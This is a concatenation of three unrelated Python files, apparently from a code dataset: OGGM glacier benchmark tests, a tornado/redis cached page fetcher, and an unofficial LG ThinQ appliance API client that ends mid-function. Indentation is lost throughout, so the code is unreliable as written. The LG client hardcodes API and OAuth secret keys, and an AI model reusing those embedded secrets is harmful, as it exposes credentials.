import salem
import oggm
# Locals
import oggm.cfg as cfg
from oggm import tasks, utils, workflow
from oggm.workflow import execute_entity_task
from oggm.tests.funcs import get_test_dir
from oggm.tests import RUN_BENCHMARK_TESTS
from oggm.utils import get_demo_file
from oggm.core.massbalance import ConstantMassBalance
# do we event want to run the tests?
if not RUN_BENCHMARK_TESTS:
raise unittest.SkipTest('Skipping all benchmark tests.')
do_plot = False
class TestSouthGlacier(unittest.TestCase):
# Test case optained from ITMIX
# Data available at:
# oggm-sample-data/tree/master/benchmarks/south_glacier
#
# Citation:
#
# Flowers, G.E., N. Roux, S. Pimentel, and C.G. Schoof (2011). Present
# dynamics and future prognosis of a slowly surging glacier.
# The Cryosphere, 5, 299-313. DOI: 10.5194/tc-5-299-2011, 2011.
def setUp(self):
# test directory
self.testdir = os.path.join(get_test_dir(), 'tmp')
if not os.path.exists(self.testdir):
os.makedirs(self.testdir)
self.clean_dir()
# Init
cfg.initialize()
cfg.PATHS['working_dir'] = self.testdir
cfg.PATHS['dem_file'] = get_demo_file('dem_SouthGlacier.tif')
cfg.PATHS['cru_dir'] = os.path.dirname(cfg.PATHS['dem_file'])
cfg.PARAMS['border'] = 10
def tearDown(self):
self.rm_dir()
def rm_dir(self):
shutil.rmtree(self.testdir)
def clean_dir(self):
shutil.rmtree(self.testdir)
os.makedirs(self.testdir)
def test_mb(self):
# This is a function to produce the MB function needed by Anna
# Download the RGI file for the run
# Make a new dataframe of those
rgidf = gpd.read_file(get_demo_file('SouthGlacier.shp'))
# Go - initialize working directories
gdirs = workflow.init_glacier_regions(rgidf)
# Preprocessing tasks
task_list = [
tasks.glacier_masks,
tasks.compute_centerlines,
tasks.initialize_flowlines,
tasks.catchment_area,
tasks.catchment_intersections,
tasks.catchment_width_geom,
tasks.catchment_width_correction,
]
for task in task_list:
execute_entity_task(task, gdirs)
# Climate tasks -- only data IO and tstar interpolation!
execute_entity_task(tasks.process_cru_data, gdirs)
tasks.distribute_t_stars(gdirs)
execute_entity_task(tasks.apparent_mb, gdirs)
mbref = salem.GeoTiff(get_demo_file('mb_SouthGlacier.tif'))
demref = salem.GeoTiff(get_demo_file('dem_SouthGlacier.tif'))
mbref = mbref.get_vardata()
mbref[mbref == -9999] = np.NaN
demref = demref.get_vardata()[np.isfinite(mbref)]
mbref = mbref[np.isfinite(mbref)] * 1000
# compute the bias to make it 0 SMB on the 2D DEM
mbmod = ConstantMassBalance(gdirs[0], bias=0)
mymb = mbmod.get_annual_mb(demref) * cfg.SEC_IN_YEAR * cfg.RHO
mbmod = ConstantMassBalance(gdirs[0], bias=np.average(mymb))
mymb = mbmod.get_annual_mb(demref) * cfg.SEC_IN_YEAR * cfg.RHO
np.testing.assert_allclose(np.average(mymb), 0., atol=1e-3)
# Same for ref
mbref = mbref - np.average(mbref)
np.testing.assert_allclose(np.average(mbref), 0., atol=1e-3)
# Fit poly
p = np.polyfit(demref, mbref, deg=2)
poly = np.poly1d(p)
myfit = poly(demref)
np.testing.assert_allclose(np.average(myfit), 0., atol=1e-3)
if do_plot:
import matplotlib.pyplot as plt
plt.scatter(mbref, demref, s=5, label='Obs (2007-2012), shifted to '
'Avg(SMB) = 0')
plt.scatter(mymb, demref, s=5, label='OGGM MB at t*')
plt.scatter(myfit, demref, s=5, label='Polyfit', c='C3')
plt.xlabel('MB (mm w.e yr-1)')
plt.ylabel('Altidude (m)')
plt.legend()
plt.show()
def test_workflow(self):
# This is a check that the inversion workflow works fine
# Download the RGI file for the run
# Make a new dataframe of those
rgidf = gpd.read_file(get_demo_file('SouthGlacier.shp'))
# Go - initialize working directories
gdirs = workflow.init_glacier_regions(rgidf)
# Preprocessing tasks
task_list = [
tasks.glacier_masks,
tasks.compute_centerlines,
tasks.initialize_flowlines,
tasks.catchment_area,
tasks.catchment_intersections,
tasks.catchment_width_geom,
tasks.catchment_width_correction,
]
for task in task_list:
execute_entity_task(task, gdirs)
# Climate tasks -- only data IO and tstar interpolation!
execute_entity_task(tasks.process_cru_data, gdirs)
tasks.distribute_t_stars(gdirs)
execute_entity_task(tasks.apparent_mb, gdirs)
# Inversion tasks
execute_entity_task(tasks.prepare_for_inversion, gdirs)
# We use the default parameters for this run
execute_entity_task(tasks.volume_inversion, gdirs, glen_a=cfg.A, fs=0)
execute_entity_task(tasks.filter_inversion_output, gdirs)
df = utils.glacier_characteristics(gdirs)
assert df.inv_thickness_m[0] < 100
if do_plot:
import matplotlib.pyplot as plt
from oggm.graphics import plot_inversion
plot_inversion(gdirs)
plt.show()
| Chris35Wills/oggm | oggm/tests/test_benchmarks.py | test_benchmarks.py | py | 5,681 | python | en | code | null | github-code | 13 |
7706597277 | import tornado.httpclient
import redis
from tornado.options import options
import tornado.gen
from tornado.log import logging
import os
r = redis.Redis(host=os.environ.get("REDIS_PORT_6379_TCP_ADDR", "localhost"))
logger = logging.getLogger('fetcher')
logger.setLevel(logging.DEBUG)
@tornado.gen.coroutine
def get_data(key):
"""
return None or the data in the redis cache
"""
global r
try:
cached = r.get(key)
return cached.decode() if cached else None
except Exception as e:
logging.exception(e)
logging.warn('Fail to connect to the redis cache server')
return None
@tornado.gen.coroutine
def write_data(key, value, timeout):
global r
try:
r.setex(key, value, timeout)
except Exception as e:
logging.exception(e)
logging.warn('Fail to connect to the redis cache server')
@tornado.gen.coroutine
def get_page(url):
"""
Cache enabled page fetching
"""
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
}
cached = yield get_data(url)
if cached and cached != "[]":
# logging.info('CACHED %s', url)
return cached
client = tornado.httpclient.AsyncHTTPClient()
result = yield client.fetch(url, headers=headers)
if 300 >= result.code >= 200:
yield write_data(url, result.body, options.CACHE_TIME)
logger.debug("fetch %s, %d", url, result.code)
return result.body
| cnssnewscenter/CNSS_mobile_news_center | fetcher.py | fetcher.py | py | 1,524 | python | en | code | 0 | github-code | 13 |
11964687042 | import requests
from urllib.parse import urljoin, urlencode, urlparse, parse_qs
import uuid
import base64
import json
import hashlib
import hmac
from datetime import datetime, timedelta
from collections import namedtuple
import enum
import time
GATEWAY_URL = 'https://kic.lgthinq.com:46030/api/common/gatewayUriList'
APP_KEY = 'wideq'
SECURITY_KEY = 'nuts_securitykey'
DATA_ROOT = 'lgedmRoot'
COUNTRY = 'SE'
LANGUAGE = 'sv-SE'
SVC_CODE = 'SVC202'
CLIENT_ID = 'LGAO221A02'
OAUTH_SECRET_KEY = 'c053c2a6ddeb7ad97cb0eed0dcb31cf8'
OAUTH_CLIENT_KEY = 'LGAO221A02'
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S +0000'
"""HVAC STATE"""
STATE_COOL = "Cool"
STATE_DRY = "Dry"
STATE_AIRCLEAN = 'ON'
STATE_AIRCLEAN_OFF = 'OFF'
STATE_SMARTCARE = 'ON'
STATE_SMARTCARE_OFF = 'OFF'
STATE_AUTODRY = 'ON'
STATE_AUTODRY_OFF = 'OFF'
STATE_POWERSAVE = 'ON'
STATE_POWERSAVE_OFF = 'OFF'
STATE_COOLPOWER = 'ON'
STATE_COOLPOWER_OFF = 'OFF'
STATE_LONGPOWER = 'ON'
STATE_LONGPOWER_OFF = 'OFF'
STATE_LOW = "Low"
STATE_MID = "Mid"
STATE_HIGH = "High"
STATE_RIGHT_LOW_LEFT_MID = "Right low left mid"
STATE_RIGHT_LOW_LEFT_HIGH = "Right low left high"
STATE_RIGHT_MID_LEFT_LOW = "Right mid left low"
STATE_RIGHT_MID_LEFT_HIGH = "Right mid left high"
STATE_RIGHT_HIGH_LEFT_LOW = "Right high left low"
STATE_RIGHT_HIGH_LEFT_MID = "Right high left mid"
STATE_RIGHT_ONLY_LOW = "Right only low"
STATE_RIGHT_ONLY_MID = "Right only mid"
STATE_RIGHT_ONLY_HIGH = "Right only high"
STATE_LEFT_ONLY_LOW = "Left only low"
STATE_LEFT_ONLY_MID = "Left only mid"
STATE_LEFT_ONLY_HIGH = "Left only high"
STATE_LEFT_RIGHT = "Left right"
STATE_RIGHTSIDE_LEFT_RIGHT = "Rightside left right"
STATE_LEFTSIDE_LEFT_RIGHT = "Leftside left right"
STATE_LEFT_RIGHT_STOP = "Left right stop"
STATE_UP_DOWN = 'ON'
STATE_UP_DOWN_STOP = 'OFF'
"""REFRIGERATOR STATE"""
STATE_ICE_PLUS = 'ON'
STATE_ICE_PLUS_OFF = 'OFF'
STATE_FRESH_AIR_FILTER_POWER = "Fresh air filter power"
STATE_FRESH_AIR_FILTER_AUTO = "Fresh air filter auto"
STATE_FRESH_AIR_FILTER_OFF = "Fresh air filter off"
STATE_SMART_SAVING_NIGHT = 'NIGHT'
STATE_SMART_SAVING_CUSTOM = 'CUSTOM'
STATE_SMART_SAVING_OFF = 'OFF'
"""DRYER STATE"""
STATE_DRYER_POWER_OFF = "N/A"
STATE_DRYER_OFF = "Power Off"
STATE_DRYER_DRYING = "Drying"
STATE_DRYER_SMART_DIAGNOSIS = "Smart Diagnosis"
STATE_DRYER_WRINKLE_CARE = "Wrinkle Care"
STATE_DRYER_INITIAL = "Initial"
STATE_DRYER_RUNNING = "Running"
STATE_DRYER_PAUSE = "Pause"
STATE_DRYER_COOLING = "Cooling"
STATE_DRYER_END = "End"
STATE_DRYER_ERROR = "Error"
STATE_DRYER_PROCESS_DETECTING = "Dryer process detecting"
STATE_DRYER_PROCESS_STEAM = "Dryer process steam"
STATE_DRYER_PROCESS_DRY = "Dryer process dry"
STATE_DRYER_PROCESS_COOLING = "Dryer process cooling"
STATE_DRYER_PROCESS_ANTI_CREASE = "Dryer process anti crease"
STATE_DRYER_PROCESS_END = "Dryer process end"
STATE_DRY_LEVEL_IRON = "Iron"
STATE_DRY_LEVEL_CUPBOARD = "Cupboard"
STATE_DRY_LEVEL_EXTRA = "Extra"
STATE_DRY_LEVEL_DAMP = "Damp"
STATE_DRY_LEVEL_LESS = "Less"
STATE_DRY_LEVEL_MORE = "More"
STATE_DRY_LEVEL_NORMAL = "Normal"
STATE_DRY_LEVEL_VERY = "Very"
STATE_DRY_TEMP_ULTRA_LOW = "Ultra Low"
STATE_DRY_TEMP_LOW = "Low"
STATE_DRY_TEMP_MEDIUM = "Medium"
STATE_DRY_TEMP_MID_HIGH = "Mid High"
STATE_DRY_TEMP_HIGH = "High"
STATE_ECOHYBRID_ECO = "Ecohybrid eco"
STATE_ECOHYBRID_NORMAL = "Ecohybrid normal"
STATE_ECOHYBRID_TURBO = "Ecohybrid turbo"
STATE_COURSE_COTTON_SOFT = "Cotton Soft"
STATE_COURSE_BULKY_ITEM = "Bulky Item"
STATE_COURSE_EASY_CARE = "Easy Care"
STATE_COURSE_COTTON = "Cotton"
STATE_COURSE_SPORTS_WEAR = "Sports Wear"
STATE_COURSE_QUICK_DRY = "Quick Dry"
STATE_COURSE_WOOL = "Wool"
STATE_COURSE_RACK_DRY = "Rack Dry"
STATE_COURSE_COOL_AIR = "Cool Air"
STATE_COURSE_WARM_AIR = "Warm Air"
STATE_COURSE_BEDDING_BRUSH = "Bedding Brush"
STATE_COURSE_STERILIZATION = "Sterilization"
STATE_COURSE_POWER = "Power"
STATE_COURSE_REFRESH = "Refresh"
STATE_COURSE_NORMAL = "Normal"
STATE_COURSE_SPEED_DRY = "Speed Dry"
STATE_COURSE_HEAVY_DUTY = "Heavy Duty"
STATE_COURSE_NORMAL = "Normal"
STATE_COURSE_PERM_PRESS = "Permenant Press"
STATE_COURSE_DELICATES = "Delicates"
STATE_COURSE_BEDDING = "Bedding"
STATE_COURSE_AIR_DRY = "Air Dry"
STATE_COURSE_TIME_DRY = "Time Dry"
STATE_SMARTCOURSE_GYM_CLOTHES = "Smartcourse gym clothes"
STATE_SMARTCOURSE_RAINY_SEASON = "Smartcourse rainy season"
STATE_SMARTCOURSE_DEODORIZATION = "Smartcourse deodorization"
STATE_SMARTCOURSE_SMALL_LOAD = "Smartcourse small load"
STATE_SMARTCOURSE_LINGERIE = "Smartcourse lingerie"
STATE_SMARTCOURSE_EASY_IRON = "Smartcourse easy iron"
STATE_SMARTCOURSE_SUPER_DRY = "Smartcourse super dry"
STATE_SMARTCOURSE_ECONOMIC_DRY = "Smartcourse economic dry"
STATE_SMARTCOURSE_BIG_SIZE_ITEM = "Smartcourse big size item"
STATE_SMARTCOURSE_MINIMIZE_WRINKLES = "Smartcourse minimize wrinkles"
STATE_SMARTCOURSE_FULL_SIZE_LOAD = "Smartcourse full size load"
STATE_SMARTCOURSE_JEAN = "Smartcourse jean"
STATE_ERROR_DOOR = "Error door"
STATE_ERROR_DRAINMOTOR = "Error drainmotor"
STATE_ERROR_LE1 = "Error le1"
STATE_ERROR_TE1 = "Error te1"
STATE_ERROR_TE2 = "Error te2"
STATE_ERROR_F1 = "Error f1"
STATE_ERROR_LE2 = "Error le2"
STATE_ERROR_AE = "Error ae"
STATE_ERROR_dE4 = "Error de4"
STATE_ERROR_NOFILTER = "Error nofilter"
STATE_ERROR_EMPTYWATER = "Error emptywater"
STATE_ERROR_CE1 = "Error ce1"
STATE_NO_ERROR = "No Error"
STATE_OPTIONITEM_ON = "On"
STATE_OPTIONITEM_OFF = "Off"
"""WASHER STATE"""
STATE_WASHER_OFF = "Power Off"
STATE_WASHER_POWER_OFF = "N/A"
STATE_WASHER_INITIAL = "Initial"
STATE_WASHER_PAUSE = "Pause"
STATE_WASHER_ERROR_AUTO_OFF = "Error auto off"
STATE_WASHER_RESERVE = "Reserve"
STATE_WASHER_DETECTING = "Detecting"
STATE_WASHER_ADD_DRAIN = "Add drain"
STATE_WASHER_DETERGENT_AMOUT = "Detergent amout"
STATE_WASHER_RUNNING = "Running"
STATE_WASHER_PREWASH = "Pre-wash"
STATE_WASHER_RINSING = "Rinsing"
STATE_WASHER_RINSE_HOLD = "Rinse Hold"
STATE_WASHER_SPINNING = "Spinning"
STATE_WASHER_SOAK = "Soaking"
STATE_WASHER_COMPLETE = "Complete"
STATE_WASHER_FIRMWARE = "Firmware"
STATE_WASHER_SMART_DIAGNOSIS = "Smart Diagnosis"
STATE_WASHER_DRYING = "Drying"
STATE_WASHER_END = "End"
STATE_WASHER_FRESHCARE = "Freshcare"
STATE_WASHER_TCL_ALARM_NORMAL = "TCL alarm normal"
STATE_WASHER_FROZEN_PREVENT_INITIAL = "Frozen prevent initial"
STATE_WASHER_FROZEN_PREVENT_RUNNING = "Frozen prevent running"
STATE_WASHER_FROZEN_PREVENT_PAUSE = "Frozen prevent pause"
STATE_WASHER_ERROR = "Error"
STATE_WASHER_SOILLEVEL_LIGHT = "Light"
STATE_WASHER_SOILLEVEL_LIGHT_NORMAL = "Light Normal"
STATE_WASHER_SOILLEVEL_NORMAL = "Normal"
STATE_WASHER_SOILLEVEL_NORMAL_HEAVY = "Normal Heavy"
STATE_WASHER_SOILLEVEL_HEAVY = "Heavy"
STATE_WASHER_SOILLEVEL_PRE_WASH = "Pre-wash"
STATE_WASHER_SOILLEVEL_SOAKING = "Soaking"
STATE_WASHER_WATERTEMP_TAP_COLD = "Tap Cold"
STATE_WASHER_WATERTEMP_COLD = "Cold"
STATE_WASHER_WATERTEMP_SEMI_WARM = "Semi-Warm"
STATE_WASHER_WATERTEMP_WARM = "Warm"
STATE_WASHER_WATERTEMP_HOT = "Hot"
STATE_WASHER_WATERTEMP_EXTRA_HOT = "Extra Hot"
STATE_WASHER_WATERTEMP_30 = '30'
STATE_WASHER_WATERTEMP_40 = '40'
STATE_WASHER_WATERTEMP_60 = '60'
STATE_WASHER_WATERTEMP_95 = '95'
STATE_WASHER_SPINSPEED_NO_SELET = "No select"
STATE_WASHER_SPINSPEED_EXTRA_LOW = "Extra Low"
STATE_WASHER_SPINSPEED_LOW = "Low"
STATE_WASHER_SPINSPEED_MEDIUM = "Medium"
STATE_WASHER_SPINSPEED_HIGH = "High"
STATE_WASHER_SPINSPEED_EXTRA_HIGH = "Extra High"
STATE_WASHER_RINSECOUNT_1 = "Washer rinsecount 1"
STATE_WASHER_RINSECOUNT_2 = "Washer rinsecount 2"
STATE_WASHER_RINSECOUNT_3 = "Washer rinsecount 3"
STATE_WASHER_RINSECOUNT_4 = "Washer rinsecount 4"
STATE_WASHER_RINSECOUNT_5 = "Washer rinsecount 5"
STATE_WASHER_DRYLEVEL_WIND = "Washer drylevel wind"
STATE_WASHER_DRYLEVEL_TURBO = "Washer drylevel turbo"
STATE_WASHER_DRYLEVEL_TIME_30 = "Washer drylevel time 30"
STATE_WASHER_DRYLEVEL_TIME_60 = "Washer drylevel time 60"
STATE_WASHER_DRYLEVEL_TIME_90 = "Washer drylevel time 90"
STATE_WASHER_DRYLEVEL_TIME_120 = "Washer drylevel time 120"
STATE_WASHER_DRYLEVEL_TIME_150 = "Washer drylevel time 150"
STATE_WASHER_NO_ERROR = "No Error"
STATE_WASHER_ERROR_dE2 = "Washer error de2"
STATE_WASHER_ERROR_IE = "Washer error ie"
STATE_WASHER_ERROR_OE = "Washer error oe"
STATE_WASHER_ERROR_UE = "Washer error ue"
STATE_WASHER_ERROR_FE = "Washer error fe"
STATE_WASHER_ERROR_PE = "Washer error pe"
STATE_WASHER_ERROR_LE = "Washer error le"
STATE_WASHER_ERROR_tE = "Washer error te"
STATE_WASHER_ERROR_dHE = "Washer error dhe"
STATE_WASHER_ERROR_CE = "Washer error ce"
STATE_WASHER_ERROR_PF = "Washer error pf"
STATE_WASHER_ERROR_FF = "Washer error ff"
STATE_WASHER_ERROR_dCE = "Washer error dce"
STATE_WASHER_ERROR_EE = "Washer error ee"
STATE_WASHER_ERROR_PS = "Washer error ps"
STATE_WASHER_ERROR_dE1 = "Washer error de1"
STATE_WASHER_ERROR_LOE = "Washer error loe"
STATE_WASHER_APCOURSE_COTTON = "Washer apcourse cotton"
STATE_WASHER_APCOURSE_SPEEDWASH_DRY = "Washer apcourse speedwash dry"
STATE_WASHER_APCOURSE_SPEEDWASH = "Washer apcourse speedwash"
STATE_WASHER_APCOURSE_SINGLE_SHIRT_DRY = "Washer apcourse single shirt dry"
STATE_WASHER_APCOURSE_RINSESPIN = "Washer apcourse rinsespin"
STATE_WASHER_APCOURSE_SPEEDBOIL = "Washer apcourse speedboil"
STATE_WASHER_APCOURSE_ALLERGYCARE = "Washer apcourse allergycare"
STATE_WASHER_APCOURSE_STEAMCLEANING = "Washer apcourse steamcleaning"
STATE_WASHER_APCOURSE_BABYWEAR = "Washer apcourse babywear"
STATE_WASHER_APCOURSE_BLANKET_ROB = "Washer apcourse blanket rob"
STATE_WASHER_APCOURSE_UTILITY = "Washer apcourse utility"
STATE_WASHER_APCOURSE_BLANKET = "Washer apcourse blanket"
STATE_WASHER_APCOURSE_LINGERIE_WOOL = "Washer apcourse lingerie wool"
STATE_WASHER_APCOURSE_COLDWASH = "Washer apcourse coldwash"
STATE_WASHER_APCOURSE_TUBCLEAN_SANITARY = "Washer apcourse tubclean sanitary"
STATE_WASHER_APCOURSE_DOWNLOAD_COUSE = "Washer apcourse download couse"
STATE_WASHER_COURSE_NORMAL = "Normal"
STATE_WASHER_COURSE_HEAVY_DUTY = "Heavy Duty"
STATE_WASHER_COURSE_DELICATES = "Delicates"
STATE_WASHER_COURSE_WATER_PROOF = "Waterproof"
STATE_WASHER_COURSE_SPEED_WASH = "Speed Wash"
STATE_WASHER_COURSE_BEDDING = "Bedding"
STATE_WASHER_COURSE_TUB_CLEAN = "Tub Clean"
STATE_WASHER_COURSE_RINSE_SPIN = "Rinse Spin"
STATE_WASHER_COURSE_SPIN_ONLY = "Spin Only"
STATE_WASHER_COURSE_PREWASH_PLUS = "Prewash Plus"
STATE_WASHER_SMARTCOURSE_SILENT = "Washer smartcourse silent"
STATE_WASHER_SMARTCOURSE_SMALL_LOAD = "Washer smartcourse small load"
STATE_WASHER_SMARTCOURSE_SKIN_CARE = "Washer smartcourse skin care"
STATE_WASHER_SMARTCOURSE_RAINY_SEASON = "Washer smartcourse rainy season"
STATE_WASHER_SMARTCOURSE_SWEAT_STAIN = "Washer smartcourse sweat stain"
STATE_WASHER_SMARTCOURSE_SINGLE_GARMENT = "Washer smartcourse single garment"
STATE_WASHER_SMARTCOURSE_SCHOOL_UNIFORM = "Washer smartcourse school uniform"
STATE_WASHER_SMARTCOURSE_STATIC_REMOVAL = "Washer smartcourse static removal"
STATE_WASHER_SMARTCOURSE_COLOR_CARE = "Washer smartcourse color care"
STATE_WASHER_SMARTCOURSE_SPIN_ONLY = "Washer smartcourse spin only"
STATE_WASHER_SMARTCOURSE_DEODORIZATION = "Washer smartcourse deodorization"
STATE_WASHER_SMARTCOURSE_BEDDING_CARE = "Washer smartcourse bedding care"
STATE_WASHER_SMARTCOURSE_CLOTH_CARE = "Washer smartcourse cloth care"
STATE_WASHER_SMARTCOURSE_SMART_RINSE = "Washer smartcourse smart rinse"
STATE_WASHER_SMARTCOURSE_ECO_WASH = "Washer smartcourse eco wash"
STATE_WASHER_TERM_NO_SELECT = "N/A"
STATE_WASHER_OPTIONITEM_ON = "On"
STATE_WASHER_OPTIONITEM_OFF = "Off"
"""DEHUMIDIFIER STATE"""
STATE_DEHUM_ON = '동작 중'
STATE_DEHUM_OFF = '꺼짐'
STATE_DEHUM_OPMODE_SMART_DEHUM = '스마트제습'
STATE_DEHUM_OPMODE_FAST_DEHUM = '쾌속제습'
STATE_DEHUM_OPMODE_SILENT_DEHUM = '저소음제습'
STATE_DEHUM_OPMODE_CONCENTRATION_DRY = '집중건조'
STATE_DEHUM_OPMODE_CLOTHING_DRY = '의류건조'
STATE_DEHUM_OPMODE_IONIZER = '공기제균'
STATE_DEHUM_WINDSTRENGTH_LOW = '약풍'
STATE_DEHUM_WIDESTRENGTH_HIGH = '강풍'
STATE_DEHUM_AIRREMOVAL_ON = '켜짐'
STATE_DEHUM_AIRREMOVAL_OFF = '꺼짐'
"""WATERPURIFIER STATE"""
STATE_WATERPURIFIER_COCKCLEAN_WAIT = '셀프케어 대기 중'
STATE_WATERPURIFIER_COCKCLEAN_ON = '셀프케어 진행 중'
"""AIRPURIFIER STATE"""
STATE_AIRPURIFIER_ON = '켜짐'
STATE_AIRPURIFIER_OFF = '꺼짐'
STATE_AIRPURIFIER_CIRCULATOR_CLEAN = '클린부스터'
STATE_AIRPURIFIER_BABY_CARE = '싱글청정'
STATE_AIRPURIFIER_CLEAN = '청정모드'
STATE_AIRPURIFIER_DUAL_CLEAN = '듀얼청정'
STATE_AIRPURIFIER_AUTO_MODE = '오토모드'
STATE_AIRPURIFIER_LOWST_LOW = '최약'
STATE_AIRPURIFIER_LOWST = '미약'
STATE_AIRPURIFIER_LOW = '약'
STATE_AIRPURIFIER_LOW_MID = '중약'
STATE_AIRPURIFIER_MID = '중'
STATE_AIRPURIFIER_MID_HIGH = '중강'
STATE_AIRPURIFIER_HIGH = '강'
STATE_AIRPURIFIER_POWER = '파워'
STATE_AIRPURIFIER_AUTO = '자동'
STATE_AIRPURIFIER_LONGPOWER = '롱파워'
STATE_AIRPURIFIER_SHOWER = '샤워풍'
STATE_AIRPURIFIER_FOREST = '숲바람'
STATE_AIRPURIFIER_TURBO = '터보'
STATE_AIRPURIFIER_FASTWIND = '빠른바람'
STATE_AIRPURIFIER_CIR_LOWST_LOW = '청정세기_최약'
STATE_AIRPURIFIER_CIR_LOWST = '청정세기_미약'
STATE_AIRPURIFIER_CIR_LOW = '청정세기_약'
STATE_AIRPURIFIER_CIR_LOW_MID = '청정세기_중약'
STATE_AIRPURIFIER_CIR_MID = '청정세기_중'
STATE_AIRPURIFIER_CIR_MID_HIGH = '청정세기_중강'
STATE_AIRPURIFIER_CIR_HIGH = '청정세기_강'
STATE_AIRPURIFIER_CIR_POWER = '청정세기_파워'
STATE_AIRPURIFIER_CIR_AUTO = '청정세기_자동'
STATE_AIRPURIFIER_CIR_LINK = '청정세기_링크'
STATE_AIRPURIFIER_TOTALAIRPOLUTION_GOOD = '좋음'
STATE_AIRPURIFIER_TOTALAIRPOLUTION_NORMAL = '보통'
STATE_AIRPURIFIER_TOTALAIRPOLUTION_BAD = '나쁨'
STATE_AIRPURIFIER_TOTALAIRPOLUTION_VERYBAD = '매우나쁨'
STATE_AIRPURIFIER_SMELL_WEEK = '약함'
STATE_AIRPURIFIER_SMELL_NORMAL = '보통'
STATE_AIRPURIFIER_SMELL_STRONG = '강함'
STATE_AIRPURIFIER_SMELL_VERYSTRONG = '매우강함'
STATE_AIRPURIFIER_NOT_SUPPORTED = '지원안함'
def gen_uuid():
return str(uuid.uuid4())
def oauth2_signature(message, secret):
"""Get the base64-encoded SHA-1 HMAC digest of a string, as used in
OAauth2 request signatures.
Both the `secret` and `message` are given as text strings. We use
their UTF-8 equivalents.
"""
secret_bytes = secret.encode('utf8')
hashed = hmac.new(secret_bytes, message.encode('utf8'), hashlib.sha1)
digest = hashed.digest()
return base64.b64encode(digest)
def as_list(obj):
"""Wrap non-lists in lists.
If `obj` is a list, return it unchanged. Otherwise, return a
single-element list containing it.
"""
if isinstance(obj, list):
return obj
else:
return [obj]
class APIError(Exception):
"""An error reported by the API."""
def __init__(self, code, message):
self.code = code
self.message = message
class NotLoggedInError(APIError):
"""The session is not valid or expired."""
def __init__(self):
pass
class TokenError(APIError):
"""An authentication token was rejected."""
def __init__(self):
pass
class MonitorError(APIError):
"""Monitoring a device failed, possibly because the monitoring
session failed and needs to be restarted.
"""
def __init__(self, device_id, code):
self.device_id = device_id
self.code = code
class NotConnectError(APIError):
"""The session is not valid or expired."""
def __init__(self):
pass
def lgedm_post(url, data=None, access_token=None, session_id=None):
"""Make an HTTP request in the format used by the API servers.
In this format, the request POST data sent as JSON under a special
key; authentication sent in headers. Return the JSON data extracted
from the response.
The `access_token` and `session_id` are required for most normal,
authenticated requests. They are not required, for example, to load
the gateway server data or to start a session.
"""
headers = {
'x-thinq-application-key': APP_KEY,
'x-thinq-security-key': SECURITY_KEY,
'Accept': 'application/json',
}
if access_token:
headers['x-thinq-token'] = access_token
if session_id:
headers['x-thinq-jsessionId'] = session_id
res = requests.post(url, json={DATA_ROOT: data}, headers=headers)
out = res.json()[DATA_ROOT]
# Check for API errors.
if 'returnCd' in out:
code = out['returnCd']
if code != '0000':
message = out['returnMsg']
if code == "0102":
raise NotLoggedInError()
elif code == "0106":
raise NotConnectError()
elif code == "0010":
return out
else:
raise APIError(code, message)
return out
def gateway_info():
"""Load information about the hosts to use for API interaction.
"""
return lgedm_post(
GATEWAY_URL,
{'countryCode': COUNTRY, 'langCode': LANGUAGE},
)
def oauth_url(auth_base):
"""Construct the URL for users to log in (in a browser) to start an
authenticated session.
"""
url = urljoin(auth_base, 'login/sign_in')
query = urlencode({
'country': COUNTRY,
'language': LANGUAGE,
'svcCode': SVC_CODE,
'authSvr': 'oauth2',
'client_id': CLIENT_ID,
'division': 'ha',
'grant_type': 'password',
})
return '{}?{}'.format(url, query)
def parse_oauth_callback(url):
"""Parse the URL to which an OAuth login redirected to obtain two
tokens: an access token for API credentials, and a refresh token for
getting updated access tokens.
"""
params = parse_qs(urlparse(url).query)
return params['access_token'][0], params['refresh_token'][0]
def login(api_root, access_token):
"""Use an access token to log into the API and obtain a session and
return information about the session.
"""
url = urljoin(api_root + '/', 'member/login')
data = {
'countryCode': COUNTRY,
'langCode': LANGUAGE,
'loginType': 'EMP',
'token': access_token,
}
return lgedm_post(url, data)
def refresh_auth(oauth_root, refresh_token):
"""Get a new access_token using a refresh_token.
May raise a `TokenError`.
"""
token_url = urljoin(oauth_root, '/oauth2/token')
data = {
'grant_type': 'refresh_token',
'refresh_token': refresh_token,
}
# The timestamp for labeling OAuth requests can be obtained
# through a request to the date/time endpoint:
# https://us.lgeapi.com/datetime
# But we can also just generate a timestamp.
timestamp = datetime.utcnow().strftime(DATE_FORMAT)
# The signature for the requests is on a string consisting of two
# parts: (1) a fake request URL containing the refresh token, and (2)
# the timestamp.
req_url = ('/oauth2/token?grant_type=refresh_token&refresh_token=' +
refresh_token)
sig = oauth2_signature('{}\n{}'.format(req_url, timestamp),
OAUTH_SECRET_KEY)
headers = {
'lgemp-x-app-key': OAUTH_CLIENT_KEY,
'lgemp-x-signature': sig,
'lgemp-x-date': timestamp,
'Accept': 'application/json',
}
res = requests.post(token_url, data=data, headers=headers)
res_data = res.json()
if res_data['status'] != 1:
raise TokenError()
return res_data['access_token']
class Gateway(object):
def __init__(self, auth_base, api_root, oauth_root):
self.auth_base = auth_base
self.api_root = api_root
self.oauth_root = oauth_root
@classmethod
def discover(cls):
gw = gateway_info()
return cls(gw['empUri'], gw['thinqUri'], gw['oauthUri'])
def oauth_url(self):
return oauth_url(self.auth_base)
class Auth(object):
def __init__(self, gateway, access_token, refresh_token):
self.gateway = gateway
self.access_token = access_token
self.refresh_token = refresh_token
@classmethod
def from_url(cls, gateway, url):
"""Create an authentication using an OAuth callback URL.
"""
access_token, refresh_token = parse_oauth_callback(url)
return cls(gateway, access_token, refresh_token)
def start_session(self):
"""Start an API session for the logged-in user. Return the
Session object and a list of the user's devices.
"""
session_info = login(self.gateway.api_root, self.access_token)
session_id = session_info['jsessionId']
return Session(self, session_id), as_list(session_info['item'])
def refresh(self):
"""Refresh the authentication, returning a new Auth object.
"""
new_access_token = refresh_auth(self.gateway.oauth_root,
self.refresh_token)
return Auth(self.gateway, new_access_token, self.refresh_token)
class Session(object):
def __init__(self, auth, session_id):
self.auth = auth
self.session_id = session_id
def post(self, path, data=None):
"""Make a POST request to the API server.
This is like `lgedm_post`, but it pulls the context for the
request from an active Session.
"""
url = urljoin(self.auth.gateway.api_root + '/', path)
return lgedm_post(url, data, self.auth.access_token, self.session_id)
def get_devices(self):
"""Get a list of devices associated with the user's account.
Return a list of dicts with information about the devices.
"""
return as_list(self.post('device/deviceList')['item'])
def monitor_start(self, device_id):
